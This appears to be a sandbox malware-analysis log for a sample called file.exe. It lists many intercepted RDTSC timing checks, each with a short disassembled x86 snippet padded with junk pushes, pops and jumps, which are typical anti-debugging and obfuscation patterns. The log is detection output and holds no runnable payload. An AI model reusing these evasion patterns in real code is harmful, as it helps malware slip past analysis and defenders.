          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70055 second address: B700BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5BEDA44Fh 0x00000010 call 00007F17414E33F9h 0x00000015 push ebx 0x00000016 jmp 00007F17414E3408h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d jmp 00007F17414E33FAh 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17414E3407h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B700BC second address: B700CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70269 second address: B70272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7035E second address: B70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70362 second address: B7038B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F17414E3408h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7038B second address: B70390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70390 second address: B703BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F17414E3409h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70CBC second address: B70D0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F174075FE80h 0x0000000d nop 0x0000000e mov di, cx 0x00000011 lea eax, dword ptr [ebp+12486785h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F174075FE78h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 jmp 00007F174075FE7Ah 0x00000036 nop 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70D0A second address: B70D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70D21 second address: B70D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70D25 second address: B70D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F17414E3408h 0x0000000e pop edx 0x0000000f nop 0x00000010 sbb di, 195Eh 0x00000015 lea eax, dword ptr [ebp+12486741h] 0x0000001b mov di, F221h 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F17414E33FEh 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70D69 second address: B70D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70D7F second address: B70D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5F72 second address: BA5F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5F78 second address: BA5F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F17414E33F6h 0x0000000d jmp 00007F17414E33FFh 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5F9F second address: BA5FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F174075FE76h 0x00000008 jmp 00007F174075FE83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA614A second address: BA6180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3407h 0x00000009 popad 0x0000000a jl 00007F17414E3403h 0x00000010 jmp 00007F17414E33FBh 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA65DF second address: BA65E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA65E4 second address: BA65EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA65EA second address: BA661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F174075FE76h 0x0000000c jmp 00007F174075FE86h 0x00000011 jl 00007F174075FE76h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA661A second address: BA661E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA661E second address: BA6627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6627 second address: BA6632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABC09 second address: BABC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F174075FE76h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABC18 second address: BABC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB921 second address: BAB927 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC790 second address: BAC795 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC913 second address: BAC939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F174075FE7Bh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC939 second address: BAC949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F17414E33F6h 0x0000000a jno 00007F17414E33F6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC949 second address: BAC95F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007F174075FE76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F174075FE76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBC9 second address: BACBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F17414E3406h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBE7 second address: BACBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBEC second address: BACBFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F17414E33FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29867 second address: B2986B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4E9C second address: BB4EA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4EA6 second address: BB4EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3397B second address: B3397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3397F second address: B33983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33983 second address: B3398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4A1 second address: BBA4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F174075FE76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4B1 second address: BBA4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA7AE second address: BBA7BB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA941 second address: BBA946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAB93 second address: BBABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F174075FE76h 0x0000000a popad 0x0000000b jns 00007F174075FE7Ah 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD77C second address: BBD780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD780 second address: BBD786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD786 second address: BBD7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3409h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD7A5 second address: BBD7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38E1 second address: BC38E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2173 second address: BC218A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC218A second address: BC2196 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F17414E33F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC232D second address: BC2339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F174075FE76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2763 second address: BC276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC276D second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC28FB second address: BC2918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17414E3403h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2918 second address: BC291E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC291E second address: BC2924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2924 second address: BC2929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2929 second address: BC292F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2A67 second address: BC2A71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2A71 second address: BC2A95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 jmp 00007F17414E33FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC35DC second address: BC35F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F174075FE7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC35F1 second address: BC3601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F17414E33F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3601 second address: BC3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB775 second address: BCB779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC98C6 second address: BC98CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9A65 second address: BC9A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F17414E33FCh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA313 second address: BCA31D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA608 second address: BCA613 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA613 second address: BCA627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F174075FE76h 0x0000000a jne 00007F174075FE76h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAC85 second address: BCAC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD42E7 second address: BD42EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3983 second address: BD399D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F17414E3405h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD399D second address: BD39DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F174075FE7Dh 0x00000008 jmp 00007F174075FE81h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007F174075FE7Ah 0x00000017 pushad 0x00000018 jmp 00007F174075FE7Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B13 second address: BD3B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F17414E33F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B1F second address: BD3B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B23 second address: BD3B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B27 second address: BD3B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F174075FE76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B38 second address: BD3B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC8A3 second address: BDC8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA922 second address: BDA932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F17414E33FEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAA88 second address: BDAA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB49C second address: BDB4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F17414E3406h 0x00000011 jmp 00007F17414E33FEh 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push esi 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB783 second address: BDB787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB787 second address: BDB78B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB78B second address: BDB7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7A9 second address: BDB7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7AF second address: BDB7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7C3 second address: BDB7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA49B second address: BDA4A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F174075FE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE40A5 second address: BE40B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F17414E33FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE40B8 second address: BE40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4129 second address: BF414B instructions: 0x00000000 rdtsc 0x00000002 je 00007F17414E33F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17414E3404h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF414B second address: BF418A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F174075FE87h 0x00000010 pop edi 0x00000011 jns 00007F174075FE7Eh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F174075FE7Bh 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF614F second address: BF6196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F17414E3430h 0x0000000f jmp 00007F17414E3406h 0x00000014 pushad 0x00000015 jmp 00007F17414E3408h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CD5 second address: BF5CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB396 second address: BFB39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
